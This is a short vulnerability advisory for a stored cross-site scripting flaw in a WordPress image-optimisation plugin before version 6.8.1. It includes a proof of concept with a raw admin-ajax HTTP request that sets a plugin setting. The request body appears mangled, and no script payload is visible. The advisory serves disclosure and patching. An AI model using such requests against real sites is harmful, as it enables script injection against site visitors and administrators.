Image Optimizer, Resizer and CDN < 6.8.1 - Admin+ Stored XSS

The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

PoC

Step 1: Install the plugin and register for an account. Step 2: Send an ajax request as shown: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: wpscan.local Content-Length: 83 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://wpscan.local Referer: http://wpscan.local/wp-admin/admin.php?page=sirv%2Fsirv%2Fshortcodes-view.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [admin+] Connection: close action=sirv_setup_credentials&email;=&sirv;_account=aaa Step 3: Refresh the account page to get the XSS popup.